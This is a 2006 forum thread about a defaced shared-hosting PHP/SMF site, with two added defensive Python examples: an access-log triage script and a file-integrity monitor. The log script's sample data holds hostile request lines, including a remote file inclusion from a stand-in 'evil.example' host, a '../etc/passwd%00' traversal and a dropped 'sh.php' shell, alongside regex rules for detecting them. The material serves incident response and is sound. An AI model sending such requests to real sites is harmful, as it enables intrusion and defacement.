my site was hacked


penth
03-25-2006, 11:26 PM
One day I got up and my front page (index.php) had been modified: it was a page of black and red letters saying "paw3d", with the site name http://www.intikam.org, and signed with the name of whoever hacked us. Has anyone ever heard of any 1and1 customer being hacked this way? Do you know how they might have hacked me? Would it be a problem with my code, which is written simply in PHP with SMF set up (I can't say more)? I doubt it. There is no FTP access info in there, and my passwords are not possible to guess. Would it be a 1and1 server vulnerability? If you know how they hacked me and how I should prevent it, please let me know, preferably by PM. Thanks.

C-4 Hosting
03-26-2006, 10:13 AM
It was more than likely your PHP script / code. This has happened to others too. Ensure that your script is up-to-date with the latest release and any security patches.

What is your site name and what script(s) are you running on it?

penth
03-26-2006, 02:52 PM
No, it wasn't. It was a horrible experience :-x. Almost the whole site had been deleted: no more files, only empty folders, and even the folders had been deleted. We recreated them, then they deleted them again. We found some IPs from Turkey, only HTTP access. Mirror, defacement, etc.; we only found HTTP access from them, no FTP access. It must be a 1and1 security hole. These guys are serious, and I hesitate to mention the rest on a public forum; I wish to be PMed or so. Or if you wish to help me, if you have hacking or security skills and are kind enough, please leave me a PM or a note indicating you want to help me. I'll PM you back. Thanks so much.

eWebtricity
03-27-2006, 01:36 AM
I wouldn't call it a 1and1 security hole. It comes with the territory of operating a dedicated server on your own. Your best option is probably to wipe the server clean with a reimage and restore from a known good backup, unless that's not an option. If it's not a script vulnerability, then they gained access through some other service running on your server. You might consider running APF/BFD, chkrootkit, rkhunter, portsentry, hostsentry, tripwire, and/or snort, which could email you real-time alerts of suspicious activity.

Highland
03-27-2006, 11:01 AM
and my passwords aren't possible to guessed.

First off, there is no such thing as 100% secure. And you can tell yourself that your password is secure but... well, let's just say there are people out there who eat secure passwords for lunch. Your passwords may not be guessable, but I guarantee they can be cracked if given enough time.

Second, security is best done in layers. Make certain you're running the latest version of your software. If you write your own, examine your logs and see what, if anything, was done to break your script. If you don't verify user data strictly, you invite attacks. Another beneficial security layer is mod_security. It sits inside Apache and can help prevent cross-site scripting attacks and such. If your loophole was indeed HTTP, this may very well close it for you.
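Highland's advice is to go through the access logs and look for what was done to the script. The block below is an added example of that triage, not code from the thread or from any of its posters. It parses Apache "combined" log lines, decodes the URL, and flags the request patterns that most often explained an HTTP-only compromise of a hand-written PHP front end in that era: a page parameter pointing at a remote URL (remote file inclusion), directory traversal and null-byte truncation, a cmd= parameter, and a .php file being requested from a directory that should only hold uploads. The sample log lines, the addresses (documentation ranges), the hostnames and the rule list are all constructed for the example; a real log would need rules tuned to the site's own scripts.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in Apache "combined" log format. Addresses, paths and
# hostnames are made up for this example; they are not from the thread.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Mar/2006:03:12:01 +0100] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [25/Mar/2006:03:12:09 +0100] "GET /index.php?page=http://evil.example/c.txt? HTTP/1.1" 200 812 "-" "Mozilla/4.0"
203.0.113.7 - - [25/Mar/2006:03:12:15 +0100] "GET /index.php?page=http://evil.example/c.txt?cmd=ls HTTP/1.1" 200 2044 "-" "Mozilla/4.0"
198.51.100.20 - - [25/Mar/2006:03:14:40 +0100] "GET /forum/index.php?topic=12.0 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Mar/2006:03:15:02 +0100] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1732 "-" "Mozilla/4.0"
203.0.113.7 - - [25/Mar/2006:03:16:30 +0100] "POST /images/sh.php HTTP/1.1" 200 120 "-" "Mozilla/4.0"
"""

# ip ident user [timestamp] "METHOD path PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Illustrative rules, matched against the percent-decoded request path.
RULES = [
    # include()/require() fed a URL: classic remote file inclusion
    ("remote_include", re.compile(r'[?&]\w+=(?:https?|ftp)://', re.I)),
    # ../ or ..\ in any parameter
    ("path_traversal", re.compile(r'\.\.[/\\]')),
    # %00 used to cut off an appended extension such as ".php"
    ("null_byte", re.compile(r'\x00')),
    # command parameter typical of dropped PHP shells
    ("cmd_param", re.compile(r'[?&]cmd=', re.I)),
    # a .php file executed from a directory that should hold uploads only
    ("php_in_upload_dir", re.compile(r'^/(?:images|uploads|avatars)/[^?]*\.php(?:$|\?)', re.I)),
]


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode %xx first so %2e%2e/ is seen as ../ and %00 as a real NUL.
    rec["path"] = unquote(rec["path"])
    return rec


def triage(log_text, suspect_ips=()):
    """Return (hits, per_ip).

    hits: every request that trips at least one rule, or that comes from an
    address already known to be hostile (so the whole session is kept).
    per_ip: request count per client address, to spot unusually busy ones."""
    hits, per_ip = [], Counter()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        per_ip[rec["ip"]] += 1
        names = [name for name, rx in RULES if rx.search(rec["path"])]
        if rec["ip"] in suspect_ips:
            names.append("suspect_ip")
        if names:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                         "path": rec["path"], "status": rec["status"], "rules": names})
    return hits, per_ip


def attacker_timeline(hits, ip):
    """Chronological (timestamp, method, path) list for one address, i.e. what that client did."""
    return [(h["ts"], h["method"], h["path"]) for h in hits if h["ip"] == ip]


if __name__ == "__main__":
    hits, per_ip = triage(SAMPLE_LOG, suspect_ips={"203.0.113.7"})
    print("requests per address:", dict(per_ip))
    for h in hits:
        print(h["ts"], h["ip"], h["method"], repr(h["path"]), h["status"], ",".join(h["rules"]))
```

Run against the real access log, the output is what to read next: the first request that trips remote_include or path_traversal tells you which script and which parameter was abused, and a later 200 on a .php file under an upload directory tells you where the shell was dropped. Note that a 200 status on the bad requests is what matters; a 404 means the guess failed.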

C-4 Hosting
03-27-2006, 11:05 AM
Just as a little update... It would seem that penth doesn't have a dedicated server but has a shared basic account with 1and1.

I spoke with him last night via AIM and took a look around for him. He's running SMF Forums with some front-end script that he and his partner wrote themselves. From everything I've seen, it was definitely something in the scripting that allowed the attacker(s) in. There was also no .htaccess either.

penth
03-27-2006, 06:51 PM
Actually there is an .htaccess file; it just got deleted. My partner tried your method of blocking IPs; in a test he was able to block my IP for HTTP access. But for now, I have removed every file on the server and almost recreated it from scratch, and it doesn't seem to be attacked anymore. So it might be a security hole in my site script, but I also heard a rumor on that hacker's site that some of them were being hacked; if that is the case, then we might just have been lucky. And the access log indicates that there is only HTTP access and NO FTP access from the hackers (about 10+ IPs were tracked, from Turkey). I'm not sure if there are any other ports aside from 21 and 80, so if there are more attacks I'll post my updates here. I hope it's not a 1and1 security hole, since I really like 1and1's connection power, though its admin/web control panel sucks. If it is a security hole of 1and1 itself, how would I know? What would it look like? And thanks to C-4 Hosting for the help, really appreciated. I'll try the programs suggested by eWebtricity. Thanks for all your replies!

P.S.: Aside from eWebtricity's suggestion, is there any web-based monitoring script that you guys can suggest, such as a PHP-based one? Since this is shared hosting, I have very little control over the system, but if it's PHP-based I am afraid that once my site is hacked again this program will be hacked too, since the hacker seems to have full access to my FTP (even though he never gained access to FTP): he can delete and create as he wishes. Does anyone know how this hack works and what limitations he has? He seems unable to alter the .htaccess file, but he does; however, he can delete the whole directory even when the .htaccess is in it. According to the site where the hacker posted his "triumph" of "hacked sites", it's called defacement and mirroring. If anyone has heard of it, please let me know any info that you can find: how it works and how you make it work.
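penth asks for a monitoring script that could run on a shared account and worries that a PHP-based one would be compromised along with the site. Two facts answer the puzzle in the post: a PHP script on shared hosting runs with the hosting account's own privileges, so anything the attacker can make the vulnerable script do (unlink, rmdir, fopen for writing) reaches every file the account owns, .htaccess included, with no FTP login needed; and the same holds for any monitor stored in the same account. The block below is an added example of a file-integrity check of the kind tripwire does, reduced to what a cron job or a manually run script can do on a shared account; it is not code from the thread, from 1and1 or from SMF. It assumes the account has a directory outside the document root (the "private" directory in the demo is an assumed layout) to hold the baseline, and it treats a missing baseline as an alert for exactly the reason penth gives. Keeping a copy of the baseline off the server, and mailing the report to an address the attacker cannot read, is what turns it into something the intruder cannot silently defeat.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path


def hash_file(path, chunk=65536):
    """SHA-256 of a file, read in chunks so large uploads do not exhaust memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Map relative path -> digest/size/mode for every regular file under root.
    Dotfiles such as .htaccess are included on purpose: their removal matters."""
    root = Path(root)
    snap = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            st = p.stat()
            snap[p.relative_to(root).as_posix()] = {
                "sha256": hash_file(p),
                "size": st.st_size,
                "mode": f"{st.st_mode & 0o777:04o}",   # a chmod to 777 is also a change
            }
    return snap


def diff_snapshots(baseline, current):
    """Classify every path as added, removed or modified (content or permission change)."""
    base_keys, cur_keys = set(baseline), set(current)
    modified = sorted(
        p for p in base_keys & cur_keys
        if baseline[p]["sha256"] != current[p]["sha256"]
        or baseline[p]["mode"] != current[p]["mode"]
    )
    return {
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
        "modified": modified,
    }


def write_baseline(root, baseline_path):
    """Record the known-good state. Run this once, right after a clean rebuild."""
    Path(baseline_path).write_text(json.dumps(snapshot(root), indent=1, sort_keys=True))


def check(root, baseline_path):
    """Compare the live tree against the stored baseline.

    A missing or unreadable baseline is itself reported as an alert, because an
    intruder who can delete files in the account can delete the baseline too."""
    try:
        baseline = json.loads(Path(baseline_path).read_text())
    except (OSError, ValueError) as exc:
        return {"baseline_missing": True, "error": str(exc)}
    report = diff_snapshots(baseline, snapshot(root))
    report["baseline_missing"] = False
    report["clean"] = not (report["added"] or report["removed"] or report["modified"])
    return report


def demo_defacement():
    """Build a throwaway web root, baseline it, simulate a defacement and return
    the check result. The layout, file names and contents are constructed for the demo."""
    work = Path(tempfile.mkdtemp(prefix="fim-demo-"))
    try:
        htdocs = work / "htdocs"      # assumed document root
        private = work / "private"    # assumed directory outside the document root
        (htdocs / "images").mkdir(parents=True)
        private.mkdir()
        (htdocs / "index.php").write_text("<?php echo 'front page'; ?>")
        (htdocs / ".htaccess").write_text("Deny from 203.0.113.0/24\n")
        (htdocs / "images" / "logo.png").write_bytes(b"\x89PNG fake image data")
        baseline = private / "baseline.json"
        write_baseline(htdocs, baseline)

        # Simulated defacement: front page replaced, .htaccess deleted, a PHP
        # file dropped into the image directory, all as the account user.
        (htdocs / "index.php").write_text("<html><body>defaced</body></html>")
        (htdocs / ".htaccess").unlink()
        (htdocs / "images" / "sh.php").write_text("<?php /* dropped file */ ?>")
        return check(htdocs, baseline)
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(demo_defacement(), indent=1))
```

On a real account the two entry points are write_baseline(document_root, private_dir/"baseline.json") once after the rebuild, and check(...) from cron (or by hand) with the report mailed out; compare the mailed baseline against the on-server copy now and then, since an attacker with write access to the account could regenerate the baseline after defacing.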